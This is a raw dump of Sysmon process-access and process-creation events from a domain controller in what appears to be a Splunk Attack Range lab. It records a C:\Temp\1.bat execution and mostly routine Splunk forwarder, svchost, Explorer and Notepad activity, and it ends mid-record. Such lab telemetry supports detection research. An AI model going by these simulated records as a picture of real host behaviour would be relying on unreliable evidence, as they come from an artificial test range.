C:\Temp\1.batC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=BA78FCF8CA9D806C6C047357E31748DE,SHA256=34A07759492E31AEC2A009505FE8DFB50242375C4308AD4657B2872F4F75A077,IMPHASH=968239BE2020F1C0DAFFDCDBD49E9C82{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x800000000000000010631Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:04.709{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6660-6064-6A01-00000000AE01}2504C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010630Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.709{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010629Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:04.709{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010628Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.709{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010627Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:04.709{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010626Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.709{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6660-6064-6A01-00000000AE01}2504C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010625Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.709{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6660-6064-6A01-00000000AE01}2504C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010624Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.710{266CAFBE-6660-6064-6A01-00000000AE01}2504C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000010659Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:05.787{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84823DE8FA0438F16233C2B252880C76,SHA256=5F257E98953B3DB02FBCBBF299EC674249E8EEB0DA2B61D3D4D4E2BFD6D8A51F,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000010658Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:05.021{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010657Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:05.021{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010656Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:05.021{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010655Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:05.021{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010654Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:05.006{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010653Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:05.006{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010652Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:05.006{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010651Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:05.006{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010650Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:05.006{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010649Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:05.006{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010648Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:05.006{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010647Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:05.006{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010646Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:05.006{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010645Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:04.990{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010678Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.990{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6662-6064-6D01-00000000AE01}3084C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010677Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:06.990{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010676Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.990{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010675Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:06.990{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010674Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.990{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010673Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.990{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6662-6064-6D01-00000000AE01}3084C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010672Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.990{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6662-6064-6D01-00000000AE01}3084C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010671Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.991{266CAFBE-6662-6064-6D01-00000000AE01}3084C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program 